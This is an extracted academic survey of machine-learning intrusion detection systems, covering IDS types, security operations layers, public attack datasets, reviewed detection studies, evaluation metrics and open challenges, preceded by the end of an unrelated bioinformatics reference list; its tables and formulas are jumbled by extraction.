between pairs of dna sequences. Sci. Rep. 5(1), 1–9 (2015) 38. Pratiwi, M., Harefa, J., Nanda, S., et al.: Mammograms classification using graylevel co-occurrence matrix and radial basis function neural network. Procedia Comput. Sci. 59, 83–91 (2015) 39. Randhawa, G.S., Hill, K.A., Kari, L.: Ml-dsp: machine learning with digital signal processing for ultrafast, accurate, and scalable genome classification at all taxonomic levels. BMC Genom. 20(1), 1–21 (2019) 40. Ranganathan, S., Nakai, K., Schonbach, C.: Encyclopedia of Bioinformatics and Computational Biology. ABC of Bioinformatics. Elsevier (2018) 41. Ren, J., et al.: Identifying viruses from metagenomic data using deep learning. Quant. Biol. 8, 1–14 (2020) 42. Rosenberg, M.S.: Sequence Alignment: Methods, Models, Concepts, and Strategies. University of California Press (2009) 43. Ruichek, Y., et al.: Attractive-and-repulsive center-symmetric local binary patterns for texture classification. Eng. Appl. Artif. Intell. 78, 158–172 (2019) 44. Bhavya, S.V., Narasimha, G.R., Ramya, M., Sujana, Y.S., Anuradha, T.: Classification of skin cancer images using tensorflow and inception v3. Int. J. Eng. Technol. 7, 717–721 (2018) 45. Santamar´ıa, L.A., Zu˜ niga, S., Pineda, I.H., Somodevilla, M.J., Rossainz, M.: Reconocimiento de genes en secuencias de adn por medio de im´ agenes. DNA sequence recognition using image representation. Res. Comput. Sci. 148, 105–114 (2019) 46. Shanan, N.A.A., Lafta, H.A., Alrashid, S.Z.: Using alignment-free methods as preprocessing stage to classification whole genomes. Int. J. Nonlinear Anal. Appl. 12(2), 1531–1539 (2021) 47. Sharifnejad, M., Shahbahrami, A., Akoushideh, A., Hassanpour, R.Z.: Facial expression recognition using a combination of enhanced local binary pattern and pyramid histogram of oriented gradients features extraction. IET Image Process. 15(2), 468–478 (2021)
58
D. P. Cussi and V. E. Machaca Arceda
48. Simonyan, K., Zisserman, A.: Very deep convolutional networks for large-scale image recognition. arXiv preprint arXiv:1409.1556 (2014) 49. Singh, P., Verma, P., Singh, N.: Offline signature verification: an application of glcm features in machine learning. Ann. Data Sci. 96, 1–13 (2021) 50. Solis-Reyes, S., Avino, M., Poon, A., Kari, L.: An open-source k-mer based machine learning tool for fast and accurate subtyping of hiv-1 genomes. PloS One 13(11), e0206409 (2018) 51. Sultana, M., Bhatti, M.N.A., Javed, S., Jung, S.-K.: Local binary pattern variantsbased adaptive texture features analysis for posed and nonposed facial expression recognition. J. Electron. Imaging 26(5), 053017 (2017) 52. Szegedy, C., et al.: Going deeper with convolutions. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 1–9 (2015) 53. Szegedy, C., Vanhoucke, V., Ioffe, S., Shlens, J., Wojna, Z.: Rethinking the inception architecture for computer vision. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 2818–2826 (2016) 54. Tello-Mijares, S., Woo, L.: Computed tomography image processing analysis in covid-19 patient follow-up assessment. J. Healthcare Eng. 2021 (2021) 55. Vu, H.N., Nguyen, M.H., Pham, C.: Masked face recognition with convolutional neural networks and local binary patterns. Appl. Intell. 52(5), 5497–5512 (2022) 56. Wang, H., Li, L., Zhou, C., Lin, H., Deng, D.: Spark-based parallelization of basic local alignment search tool. Int. J. Bioautom. 24(1), 87 (2020) 57. Wood, D.E., Salzberg, S.L.: Kraken: ultrafast metagenomic sequence classification using exact alignments. Genome Biol. 15(3), 1–12 (2014) 58. Yang, F., Ying-Ying, X., Wang, S.-T., Shen, H.-B.: Image-based classification of protein subcellular location patterns in human reproductive tissue by ensemble learning global and local features. Neurocomputing 131, 113–123 (2014) 59. Youssef, K., Feng, W.: Sparkleblast: scalable parallelization of blast sequence alignment using spark. In: 2020 20th IEEE/ACM International Symposium on Cluster, Cloud and Internet Computing (CCGRID), pp. 539–548. IEEE (2020) 60. Zielezinski, A., Vinga, S., Almeida, J., Karlowski, W.M.: Alignment-free sequence comparison: benefits, applications, and tools. Genome Biol. 18(1), 1–17 (2017)
A Review of Intrusion Detection Systems Using Machine Learning: Attacks, Algorithms and Challenges Jose Luis Gutierrez-Garcia1 , Eddy Sanchez-DelaCruz2(B) , and Maria del Pilar Pozos-Parra3 1
National Technological of Mexico, Campus Misantla and Campus Teziutlan, Misantla, Mexico 2 National Technological of Mexico, Campus Misantla, Misantla, Mexico [email protected] 3 Autonomous University of Baja California, Mexicali, Mexico [email protected] Abstract. Cybersecurity has become a priority concern of the digital society. Many attacks are becoming more sophisticated, requiring strengthening the strategies of identification, analysis, and management of vulnerability to stop threats. Intrusion Detection/Prevention Systems are first security devices to protect systems. This paper presents a survey of several aspects to consider in machine learning-based intrusion detection systems. This survey presents the Intrusion Detection Systems taxonomy, the types of attacks they face, as well as the organizational infrastructure to respond to security incidents. The survey also describes several investigations to detect intrusions using Machine Learning, describing in detail the databases used. Moreover, the most accepted metrics to measure the performance of algorithms are presented. Finally, the challenges are discussed motivating future research. Keywords: Intrusion detection systems security
1
· Machine learning · Cyber
Introduction
Cybersecurity is the set of technologies and processes to protect computers, networks, programs and data from attacks, unauthorized access, modifications or destruction to ensure the confidentiality, integrity and availability of information [1]. Cybersecurity is critical because our society is digitally connected for everyday activities such as business, health, education, transportation and entertainment through the internet. The impacts of attacks on cybersecurity are observed in the economy even in the influence on the democracy of a country [2]. Cyber attacks are part of the list of global risks in the report published by the World Economic Forum. This report indicates that 76.1% expect that cyberattacks to critical infrastructures will increase and 75% expect an increase in attacks in search of money or data [3]. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 59–78, 2023. https://doi.org/10.1007/978-3-031-28073-3_5
60
J. L. Gutierrez-Garcia et al.
There are two types of attacks: passive and active. A passive attack attempts to obtain information to learn more about the system in order to compromise other resources. An active attack is directed towards the system to alter its resources and operations. Most attacks begin with (passive) recognition due to the time it will take to know the organization of the system, reaching 90% of the effort used for an intrusion. According to data reported in [4], U.S. companies in 2018 took 197 and 69 days to detect and contain data breaches respectively, which implies a deficiency in APT’s detection systems and why The defending party cannot properly identify between a legitimate user and an adversarial user in each of the stages. Proactive defense measures are required, as well as precautions that can harm the user experience and reduce their productivity. According to the report published by [5], cyber threats are a global problem and that all sectors of daily life can be affected (Table 1). Table 1. Global attack types and sources [5] Global Finance (17%)
Top attack types
Top attack sources
Web Attacks (46%)
United States (42%)
Service-Specific Attacks (28%) China (9%) DoS/DDos (8%) Technology (17%) Reconnaissance (20%)
Business (12%)
Education (11%)
United Kingdom (6%) China (37%)
Brute-Force Attack (17%)
United States (21%)
Known Bad Source (14%)
Russia (5%)
Web Attacks (42%)
United States (26%)
DoS/DDos (20%)
China (15%)
Known Bad Source (15%)
France (10%)
Brute-Force Attack (47%)
United States (25%)
Web Attacks (18%)
Netherlands (16%)
Reconnaissance (16%)
Vietnam (15%)
Government (9%) Service-Specific Attacks (27%) United States (37%) Reconnaissance (21%)
Germany (14%)
DoS/DDos (16%)
France (13%)
The forms of attack have evolved, but the types of threats remain practically the same [6] and it is important to know them to understand how they work (Fig. 1). Tools like TajMahal [7], allow novice users to perform sophisticated attacks due to the simplicity of their modules, generate alarm signals that must be considered very seriously by professionals of information technologies. As presented in [8], 78% of the attacks that were identified during the year 2019 were successful, showing the vulnerability of computing infrastructures. In the study presented by [9], various types of threats that can be presented at different levels of the OSI model, considering the protocols that are defined at each of the levels. A classification of threats is also made according to where they originate: Network, Host, Software, Physical, Human.
Machine Learning and IDS
61
Fig. 1. Taxonomy of cyberthreats [6].
2
Intrusion Detection System
An intrusion detection/prevention system (IDS/IPS) is a device or application software that monitors networks or system activities for malicious activity, policy violations and perform the corresponding action. Intrusion detection systems are network-based (NIDS) and host-based (HIDS). HIDS cannot observe network traffic patterns, but it is excellent at detecting specific malicious activities and stopping them in their tracks. The NIDS analyzes the flow of information and detects a specific suspicious activity before a data breach has occurred. The main characteristics of each IDS scheme are shown in Table 2 [11]. There are three dominant approaches in the current research literature and commercial systems: signature-based screening, supervised learning-based screening, and those using a model hybrid [10]. Hybrid techniques used in IDS combine signature and anomaly detection. They are used to reduce false positives and increase the ability to identify unknown intrusions. Signature-based detection systems are highly effective in detecting those actions for which they were programmed to alert, that is, when that type of attack or intrusion was previously presented. In order for this to take place, system logs or logs are checked to find scripts or actions that have been identified as malware. When a new anomaly is discovered and clearly described detailing its characteristics, the associated signature is coded by human experts,
62
J. L. Gutierrez-Garcia et al. Table 2. Types of IDS technology according to their position
Technology Advantages
Disadvantages
Data source
HIDS
It can verify the behavior of end-to-end encrypted communications. No additional hardware is required. Detects intrusions by verifying the file system, system calls or network events
Delay in reporting attacks. Consume host resources. Requires installation on each device. It can only monitor on installed equipment
Audit logs, log files, APIs, system calls and pattern rules
NIDS
Detects attacks by checking network packets. It can check several devices at the same time. Detects the widest ranges of network protocols
The identification of attacks from traffic. Aimed at network attacks only. Difficulty analyzing high speed networks
SNMP, TCP/UDP/ICMP. Base Information Management. Router NetFlow Logs
which is then used to detect a new occurrence of the same action. These types of systems provide high precision for those attacks that have been previously identified, however, they have difficulty identifying the Zero Day type intrusions since there is no previous signature with which to carry out the comparison and, consequently, give the corresponding warning or alarm, causing these strategies to be less effective. The detection of anomalies involves two essential elements, firstly, there is a way to identify normal behaviors, and subsequently, any deviation from this behavior can be an indicator of unwanted activities (anomalies). The anomaly detection applies to various fields such as weather anomalies, flight routes, bank transactions, academic performance, internal traffic in an organization’s network, system calls or functions, etc. The detection of anomalies in the network has become a vital component of any network over the current internet. From unexpected non-malicious events, sudden failures, to network attacks and intrusions such as denials of service, network scanning, malware propagation, botnet activity, etc., network traffic anomalies can have serious negative effects on the network. network performance and integrity. The main challenge to automatically detect and characterize traffic anomalies is that they have changing objectives. It is difficult to define precisely and continuously the set of possible anomalies that may arise, especially in the case of network attacks, as new attacks are continually emerging, as well as new variants to known attacks. An anomaly detection system should be able to detect a wide range of anomalies with various structures, without relying solely on prior knowledge and information. In this type of systems, a model of the normal behavior of the system is created through machine-learning, statistical-based or knowledge-based methods and any observed deviation from the system’s behavior is considered as an
Machine Learning and IDS
63
anomaly and, therefore, a possible intrusion. The main advantage of this type of systems is that it can identify zero-day attacks due to the recognition of a user’s abnormal activity without relying on a signature database. It also allows the identification of malicious internal activities by detecting deviations in common user behaviors. A disadvantage that these IDS have is that they can have a high rate of false positive alerts. IDS/IPS, Firewalls, Sandbox, among others, are part of the group of lowlevel elements to protect connected devices and systems and establish a security perimeter and prevent unauthorized access. Security Operations Centers (SOC) are specialized centers that collect security events, perform threat/attack detection, share threat intelligence, and coordinate responses to incidents. Information Security and Event Management (SIEM) systems provide support in SOC operations through the management of incoming events, information classification, correlation inference, intermediate results visualizations and the integration of automatic detections. SIEM systems feed on the logs of running systems, DNS servers or security systems such as firewalls, IDS, etc. (Fig. 2).
Fig. 2. Business cyber security levels [12].
In the lower level (L0) is the information of the infrastructure of the organization, L1 provides a basic security analysis, also executes some real-time responses about some malicious events, such as access control and intrusion prevention. The answers at this level are based on what is known as Commitment Indicators (IoC). These indicators serve to discover connections between them and find missing or lost or hidden components and thus have a global vision of the attack. In each of the layers of the pyramid there are programmed or analytical methods so that the information can be processed. These methods consider prior knowledge about malicious activities (signature-based antivirus, rule-based firewalls) or knowledge of normal activities (anomaly detection). The intermediate layers (L1 to L3) consider anomaly detection mechanisms as mentioned below:
64
J. L. Gutierrez-Garcia et al.
L1. At this level, it usually focuses on particular data, such as: system calls, network packets or CPU usage. There are implementations that carry out these activities, as shown in the Table 3: Table 3. Commercial implementations at level L1 [12] Supplier
Product
Anomaly
Avast
Antivirus
Program Behavior
Fortinet
IPS
Protocol
LogRhythm
Behavior of users and entities EndPoint analysis
ManageEngine Application Manager
Performance
RSA
Network
Silver Tail
Silicon Defense Anomaly detection engine based on packet statistics SolarWinds
Network packets
Log analysis of the IDS Snort Network
L2. SIEM systems connect activity fragments and infer behaviors from the flows of the L1 layer systems, as well as classify behaviors from a discovered attack. Some SIEM implementations use time series based algorithms, considering a much larger time than those presented in the L1 layer. Users and entities can be identified from the flows provided by L1, building user models and verifying incoming user behavior against the model to detect compromised accounts, abuse of privileges, brute force, treatment filtering, etc. The Table 4 shows commercial implementations. Table 4. Commercial implementations at level L2 [12] Supplier
L2 SIEM product
Anomaly
EventTracker Security Center
Behavior analysis general
HPE
Peer group analysis
ArchSight
IBM
QRadar
Traffic behavior analysis
LogRythm
LogRythm
Users and entities analysis
MicroFocus
Sentinel Enterprise Environment analysis
Splunk
Enterprise security Statistics and behavioral analysis
Trustwave
SIEM Enterprise
Network behavior analysis
L3. The systems of this level, despite being considered automatic with selflearning characteristics and high precision, the human analyst must intervene within the detection process due to the limited knowledge of the domain poured
Machine Learning and IDS
65
into these systems and with them discard false positives, remembering that an anomaly does not always indicate an attack or threat. The sources of information on security events include data on network traffic, firewall’s logs, logs from web servers, systems, access to routers, databases, applications, etc. Additionally, the challenges imposed when handling data related to security must be considered: assurance of privacy, authenticity and integrity of data related to events, adversarial attacks and the time in which the attack is carried out. Commercial IDS use datasets to carry out their operations, however, these datasets are not available due to their privacy. There are public datasets such as DARPA, KDD, NSL-KDD, ADFA-LD, which are used to carry out the training, testing and validation of the different proposed models presented. Table 5 presents a summary of the most popular datasets. Table 5. Public datasets DataSet
Description
DARPA/KDD Cup99
Dataset developed by DARPA to strengthen the development of IDS. It consists of capturing TCP packets for two months, simulated attacks or intrusions interspersed. It has 4,900,000 records and 41 variables. In 1998, this dataset was used as a basis to form the KDD Cup99 that was used in the Third International Knowledge Discovery and Data Mining Tools Competition [13]
CAIDA
Dataset of the year 2007 that contains the flow on the network traffic in DDoS attacks, this is a disadvantage since it is only one type of attack
NSL-KDD
It is a dataset developed in 2009 to address some problems presented by the KDD Cup99 in the accuracy and duplication of packages in a high percentage, influencing ML algorithms
ISCX 2012
It contains realistic network traffic, containing different types of attacks. HTTP, SMTP, SSH, IMAP, POP3 and FTP protocols packets were captured
ADFA-LD/ADFA-WD Datasets developed by the Australian Defense Force Academy containing records of the Linux and Windows operating systems of instances of malware attacks of the Zero-day type CICIDS 2018
It includes benign behavior and details of recent malware attacks in the categories of Brute Force FTP, Brute Force SSH, DoS, Heartbleed, Web Attention, Infiltration, Botnet and DDoS [14]. It is a very complete dataset that contemplates 80 characteristics of the captured traffic
66
J. L. Gutierrez-Garcia et al.
In the work presented by [15], various datasets that have been used for research purposes, their characteristics and the types of attacks they contain are shown. The CSE-CIC-IDS 2018 dataset collected on one of Amazon’s AWS LAN network (thus also known as the CIC-AWS-2018 Dataset) by the Canadian Institute of Cybersecurity (CIC). It is the evolution of CICIDS 2017 and is publicly available for research. The types of attacks that are included in this dataset are: – Botnet attack: A botnet is a collection of internet-connected devices infected by malware that allow hackers to control them. Cyber criminals use botnets to instigate botnet attacks, which include malicious activities such as credentials leaks, unauthorized access, data theft and DDoS attacks. – FTP-BruteForce: FTP Brute Force testing is a method of obtaining the user’s authentication credentials, such as the username and password to login to a FTP Server. File Servers are repositories of any organization, Attackers can use brute force applications, such as password guessing, tools and scripts in order to try all the combinations of well-known usernames and passwords. – SSH- BruteForce: SSH is high security protocol. It uses strong cryptography to protect your connection against eavesdropping, hijacking and other attacks. But brute-force attacks is major security threat against remote services such as SSH. The SSH bruteforce attack attempts to get abnormal access by guessing user accounts and passwords pair. – BruteForce-Web: Brute-force attacks take advantage of automation to try many more passwords than a human could, breaking into a system through trial and error. More targeted brute-force attacks use a list of common passwords to speed this up, and using this technique to check for weak passwords is often the first attack a hacker will try against a system. – BruteForce-XSS: Some malicious scripts can be injected into trusted web sites. XSS attacks occurs when an attacker is sending malicious code, generally in the form of a browser, to a different browser/visitor. – SQL Injection: Is a type of an injection attack that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures. – DDoS-HOIC attack: Used for denial of service (DoS) and distributed denial of service (DDoS) attacks, it functions by flooding target systems with junk HTTP GET and POST requests, which aims to flood a victim’s network with web traffic and shut down a web site or service – DDoS-LOIC-UDP attack. Flood the server with TCP-UDP packets, with the intention of interrupting the host service. – DoS- Hulk attack: A typical HULK attack may attempt to launch a SYN flood against a target host in a single or distributed manner. In addition to a large number of legitimate HTTP requests, HULK will also generate a large number of uniquely crafted malicious HTTP requests. – DoS-SlowHTTPTest attack: “Slow HTTP” attacks in web applications are based on the HTTP protocol, by design, requiring that the requests that arrive
Machine Learning and IDS
67
to it be complete before they can be processed. If an HTTP request is not complete or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data to arrive. If the server keeps many resources in use, a denial of service (DoS) could occur.DoS-GoldenEye attack. GoldenEye is similar to a HTTP flood and is a DDoS attack designed to overwhelm web servers’ resources by continuously requesting single or multiple URLs from many source attacking machines. – DoS-Slowloris attack: Slowloris is an application layer DDoS attack which uses partial HTTP requests to open connections between a single computer and a targeted Web server, then keeping those connections open for as long as possible, thus overwhelming and slowing down the target.
3
Machine Learning and Intrusion Detection
Machine Learning (ML) refers to algorithms and processes that “learn” in such a way that they are able to generalize past data and experiences to predict future results. Essentially, it is a set of mathematical techniques implemented on computer systems to mine data, discover patterns and make inferences from the data [6]. Algorithms can be classified according to learning style. In supervised learning, the input data has known labels or results that allow you to train the model and make corrections when an incorrect result is provided until you reach the desired level of precision. In unsupervised learning the input data is untagged and there is no known result, the model deduces the structure found in the input models. Finally, in semi-supervised learning, the input data is mixed, that is, labeled and unlabeled. Algorithms can also be classified by the type of operation to which they belong Table 6 shows this classification. The proposal made by [16], expose a multilayer scheme for the timely identification of botnets (IRC, SPAM, Click Fraud, DDoS, FastFlux, Port Scan, Compiled and Controlled record by CTU, HTTP, Waledac, Storm and Zeus) that use different communication channels, making use of packet capture through specialized tools such as wireshark to carry out packet filtering and only pay attention to the desired protocol, achieving an accuracy of 98%. In a review made by [18], many models generated by AI are susceptible to receiving adversarial attacks. It is established that these attacks can occur during the three stages: training, testing and implementation. Attacks can be either white box or black box, depending on the knowledge of the target model. This study was carried out on computer vision applications, image classification, semantic image segmentation, object detection and a brief segment on cybersecurity, however, it clearly exposes the vulnerabilities of the different models used. A checklist is proposed to carry out the evaluation on the robustness of the defenses against adverse attacks, considering that they range from the identification of the most tangible threat to the identification of flags and traps that usually arise during an adversarial attack [19]. In the review carried out by [20] a classification of the main types of threats/attacks was obtained (Intrusion Detection System, Alert Correlation, DoS Detection, Botnet Detection, Forensic Analysis, APT Detection, Malware Detection, Phishing Detection) that the
68
J. L. Gutierrez-Garcia et al.
Table 6. Taxonomy of machine learning algorithms Algorithms
Description
Examples
Regression algorithms
Models the relationship between variables, using a measure of error in the predictions made by the model
Ordinary Least Squares Regression (OLSR) Linear Regression Logistic Regression Stepwise Regression Multivariate Adaptive Regression Splines (MARS) Locally Estimated Scatterplot Smoothing (LOESS)
Instance-based algorithms
A database is built with sample data and compares the new incoming data against the database using a similarity measure to find the best match and make a prediction
k-Nearest Neighbor (kNN) Learning Vector Quantization (LVQ) Self-Organizing Map (SOM) Locally Weighted Learning (LWL) Support Vector Machines (SVM)
Decision tree algorithms
A decision model is constructed from the values present in the attributes of the data. They are fast and are one of the main algorithms used in
Classification and Regression Tree (CART) Iterative Dichotomiser 3 (ID3) C4.5 and C5.0 Chi-squared Automatic Interaction Detection (CHAID) Decision Stump M5 Conditional Decision Trees
Bayesian algorithms
They apply Bayes’ theorem to regression and classification problems
Naive Bayes Gaussian Naive Bayes Multinomial Naive Bayes Averaged One-Dependence Estimators (AODE) Bayesian Belief Network (BBN) Bayesian Network (BN)
Clustering algorithms
Data structures are used to k-Means k-Medians obtain the best organization Expectation Maximisation in groups as homogeneous as (EM) Hierarchical Clustering possible
Artificial neural network algorithms
Based on the functioning of biological neural networks. The input information stops for a series of operations, weight values and limiting functions
Perceptron Multilayer Perceptrons (MLP) Back-Propagation Stochastic Gradient Descent Hopfield Network Radial Basis Function Network (RBFN)
Deep learning algorithms
Evolution of artificial neural networks, they are more complex and extensive to work with large tagged analog data datasets, such as text. Image, audio and video
Convolutional Neural Network (CNN) Recurrent Neural Networks (RNNs) Long Short-Term Memory Networks (LSTMs) Stacked Auto-Encoders Deep Boltzmann Machine (DBM) Deep Belief Networks (DBN)
Machine Learning and IDS
69
efforts to face them have been investigated and published, as well as the quality attributes that must be considered when making a proposal and architectural aspects to satisfy the desired quality attributes. It exposes a great disconnect between academia and industry in terms of shared data, as well as the implementation of analytical security systems under a business environment. Given the lack of information to carry out research on recent events on intrusions, in [21] a cloud sharing scheme and research and collaborating institutions with 5 levels of trust and security are proposed, however, say of the authors themselves, it is still complex and extensive in such a way that it requires security experts to start the process. The proposed framework is accompanied by agreements and policies to carry out the sharing of information on cyber threats. Regarding the attack through Ransomware, [22] proposes an implementation using supervised ML to detect ransomware from small datasets, showing an accuracy rate of 95%. It should be noted that no further details are provided on the characteristics of the data sets used to identify the aspects considered. This type of malware executes a series of operations [Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control (C2), Actions on Objectives] to carry out the operation for which it was designed [23]. Botnets are a great threat since they can be used for various malicious activities such as distributed denial of services (DDoS), sending of mass mail considered as garbage, phishing, DNS spoofing, adware installation, etc. In the analysis presented by [24], the main components that make up a botnet are indicated, the mechanisms used for communication as well as the architecture thereof, expressing that the detection mechanisms based on signatures, anomalies and hybrids. They are the most used so far. A proposal made by [25], presents the identification of bots through graphs for being more intuitive, instead of being based on flows, due to computational cost. The proposal made by [26], expose a multilayer scheme for the timely identification of botnets (IRC, SPAM, Click Fraud, DDoS, FastFlux, Port Scan, Compiled and Controlled record by CTU, HTTP, Waledac, Storm and Zeus) that use different communication channels, making use of packet capture through specialized tools such as wireshark to carry out packet filtering and only pay attention to the desired protocol, achieving an accuracy of 98% according to the published information. Tables 7, 8 and 9 shows a summary of the proposals made through recent publications on the application of ML in the detection of intrusions through various types of attacks. The incidence of the main ML algorithms are reflected in Fig. 3, where the category of supervised learning is the most used.
4
Metrics
There are many metrics for measuring IDS performance, some metrics are more suitable for measuring performance. For example, when the data is not balanced, the accuracy metric is not recommended, as is the case with network traffic data for the classification of attacks [17]. The choice of metrics to evaluate the Machine
70
J. L. Gutierrez-Garcia et al. Table 7. Machine learning in intrusion detection. Year 2019
Year
Description
DataSet
Algorithm
Accuracy
2019 [27] Apply RNN to ISCX 2012 obtain the best characteristics dynamically based on the values that the variables present daily on each type of attack
RNN
86–90%
2019 [28] Performs an CIC-AWS-2018 evaluation of various supervised learning algorithms in each of the attacks that are established in the dataset
RF, Gaussian naive 96–100% bayes, Decision tree, MLP, K-NN
2019 [35] Flow-based anomaly NSL-KDD detection in software-defined networks, optimizing feature selection through ANOVA F-Test and RFE and ML algorithms
RF, DNN
88%
2019 [36] Classify network flows through the LSTM model
LSTM
99.46%
ISCX2012, USTC-TFC2016, IoT dataset from Robert Gordon University
Learning model is very important since it influences the way in which the model is measured and compared. Confusion Matrix: It is a tool within supervised learning to observe the behavior of the model. The test data allows us to see where there is a confusion of the model to classify the classes correctly. In Table 10 you can see the conformation of a matrix where the columns indicate the actual or current values and the rows the values that the model predicts. Based on the information shown in the matrix, the following can be indicated: TP: It is the number of actual or existing positive values that were correctly classified as positive by the model. TN: It is the number of actual or existing negative values that were correctly classified as negative by the model. FP: It is the amount of actual or existing negative values that were incorrectly classified as positive by the model. FN: It is the number of actual or existing positive values that were incorrectly classified as negative by the model.
Machine Learning and IDS
71
Table 8. Machine learning in intrusion detection. Year 2020 Year
Algorithm
Accuracy
2020 [29] Hybrid IDS is proposed that NSL-KDD combines C5 decision tree classifier and ADFA to identify known attacks and One Class Support Vector Machine to identify intrusions by means of anomalies. Network Security Laboratory-Knowledge Discovery in Databases (NSL-KDD) and Australian Defense Force Academy (ADFA) datasets are used
Description
DataSet
Decision tree, SVM
83.24, 97.4%
2020 [30] Proposes a new algorithm based on SVM, more resistant to noise and deviations, oriented to data on the sequence of system calls
FSVM based on SVDD
86.92%
2020 [31] A DNN and association rules using NSL-KDD NSL-KDD dataset to mine network traffic and classify it, subsequently, through the A priori algorithm, it seeks to eliminate false positives
DNN
89.01–99.01%
2020 [32] Adaptation of the available Datasets to balance them through the SMOTE technique to generate synthetically balanced data
KNN, DT, SVM LR, RF
93.37–98.84%
UNM sendmail, UNM live lpr published by New Mexico university
CIDDS-001 and ISCXBot-2014
2020 [33] A multilayer hierarchical model to KDD 99 work in conjunction with knowledge-based models. First, a binary classification is carried out, then the type of attack is identified and finally the previous knowledge is extracted to update the detail about the type of attack and thus improve the performance of the classifier. The time spent for training is greater than other proposals
C4.5, RF, EM, 99.8% FPA
From this confusion matrix, various metrics have been generated, oriented to problems of classification (Table 11), Regression (Table 12) or clustering (Table 13).
72
J. L. Gutierrez-Garcia et al. Table 9. Machine learning in intrusion detection. Year 2021
Year
DataSet
Algorithm
Metrics
2021 [44] They propose a two-phase technique called IOL-IDS, in the first phase it is based on the Long Short-Term Memory (LSTM) classifier and the Improved One-vs-One technique to handle frequent and infrequent intrusions. In the second phase, assembled algorithms are used to identify the types of intrusion attacks detected in each of the datasets used
Description
NSL-KDD, CIDDS- 001, CICIDS2017
LSTM
Recall: 31–98% Precision: 64–95% F1: 56–94%
2021 [43] It uses a 4-step method to detect DDoS attack: Preprocessing (coding, log2, PCA), Model generation through Random Forrest, Contrast tests with Naive Bayes, evaluation with rates of accuracy, false alarm, detection, precision, and F-measure
MIX (PORTMAP + LDAP) CICDDOS2019
RF, NB
Accuracy = 99.97% F1-score = 99.9% %
2021 [45] They propose an oversampling technique based on Generative Adversarial Networks (GAN) from the class identified as attack and selection of characteristics through ANOVA in order to balance the dataset and improve the effectiveness of intrusion detection
NSL-KDD, UNSW-NB15 y CICIDS-2017
NB, DT, RF, GBDT, SVM, K-NN, ANN
Accuracy = 97.7–99.84% F1-score= 91.89–99.6% %
2021 [46] In this study, a benchmarking is CICIDS2017 carried out on the main algorithms to evaluate the performance of the models in the detection of intrusions through various metrics and considering different percentages in the k-folds cross-validation. Only Brute Force, XSS, SQL Injection attack types were considered
ANN, DT, KNN, NB, RF, SVM, CNN K-Mean, SOM, EM
Accuracy: 75.21–99.52% Precision: 99.01–99.49% Recall: 76.6–99.52% %
2021 [34] This study uses several ML NSL-KDD algorithms to identify anomalous behavior of an IDS on the SDN controller. It first identifies when it is an attack and then classifies it to the corresponding attack type
DT, RF, XGBoost
Accuracy: 95.95% Precision: 92% Recall: 98% F1-score: 95.55% %
Machine Learning and IDS
73
Fig. 3. ML algorithms [2019–2020]. Table 10. Confusion matrix ACTUAL Positives Negatives PREDICTED Positives TP FP Negatives FN TN
5
Challenges
Dataset: Most of the investigations reviewed, use old and outdated datasets that do not reflect the current situation to carry out the tasks of identifying intrusions through different ML algorithms, and this is due to the poor accessibility of sets of data on the most recent cybersecurity related events that companies are facing. As a way to deal with this situation, many researchers choose to generate their own data sets, but constant updating of these data sets is required, implementing the latest attacks, involving a constant collection of network and system data in the purpose of maintaining training and tests as close to reality. Linking Academy - Industry: Research is conducted in simulated settings within academia, however, these settings are very different from real scenarios within organizations and the threats or attacks they face are very broad and complex requiring analysis and immediate response, and these situations generate that distance between the two entities, causing outdated knowledge. Collaboration agreements with academic entities are required to train specialized personnel and access updated data in order to ensure that the results of the investigations have an effective impact and are implemented immediately, complying with all privacy and access responsibilities at the information. Adversarial Attacks: Any strategy implemented through ML allows promising advances and results, however, the same ML technology can be used to generate
74
J. L. Gutierrez-Garcia et al.
Table 11. Performance metrics to evaluate machine learning algorithms for classification. Metrics
Formula
Classification rate or Accuracy (CR): It is the accuracy rate on detecting abnormal or normal behavior. It is normally used when the dataset is balanced to avoid a false sense of good model performance
CR =
Recall (R) or True Positive Rate (TPR) or Sensitivity: It results from dividing the number of correctly estimated attacks by the total number of attacks. It is the ability of the classifier to detect all positive cases (attacks)
TPR =
TP T P +F N
(2)
False Positive Rate (FPR): It is the rate of false alarms
FPR =
FP F P +T N
(3)
False Negative Rate (FNR): It is when the F NR = detector fails to identify an abnormality and classifies it as normal
FN F N +T P
(4)
T NR =
TN T N +F P
(5)
True Negative Rate (TNR): Also known as specificity. They are those normal cases and identified as such
Precision (P): Represents the confidence of attack P = detection. It is useful when it is not recommended to use Accuracy because the dataset is not balanced F1-Score: It is the harmonic mean between Precision and Recall (TPR), obtaining a value close to the lower value between the two when they are disproportionate. A value close to 1 means that the classifier performance is optimal
T P +T N T P +T N +F P +F N
TP T P +F P
F1 =
2P R P +R
(1)
(6)
(7)
ROC Curve: It is a graph that allows observing the performance of a binary classifier according to a cutoff threshold Area Under the Curve (AUC): It is the probability that the model classifies a random positive example more closely than a random negative example
attacks against the models in charge of identifying the intrusions, being able to alter the results provided in a biased way towards the interests of the attackers. Many researches reviewed in this sense do not consider this type of attack against the proposals expressed, so it would be desirable to know the robustness of the proposal against the adversarial attacks since they can evade the model after being trained or contaminate the data of training to force a misclassification of the model [37–39].
Machine Learning and IDS
75
Table 12. Performance metrics to evaluate machine learning algorithms for regression. Metrics
Formula
Mean Squared Error (MSE): Measure the mean square error of the predictions. The higher this value, the worse the model is
M SE =
1 N
Mean Absolute Error (MAE): It is the average of absolute differences between the original values and the predictions. It is more robust against anomalies than MSE due to the squared elevation that the latter performs
M AE =
1 N
N i=1
N i=1
(yi − yi )2
(8)
|yi − yi |2
(9)
Table 13. Performance metrics to evaluate machine learning algorithms for clustering. Metrics
Formula
Davies-Bouldin Index: The DB index Rij = assumes that clusters that are well DB = separated from each other and heavily populated form a good grouping. This index indicates the average “similarity” between groups, where similarity is a measure that compares the distance between groups with the size of the groups. Values closer to zero indicate better grouping Silhouette Coefficient: Indicates how the s = assignment of an element was carried out within the cluster. If it is closer to −1, it would have been better to assign it to the other group. If S (i) is close to 1, then the point is well assigned and can be interpreted as belonging to an “appropriate” cluster
si +sj dij k 1 i=1 k
maxi=j Rij
b−a max(a,b)
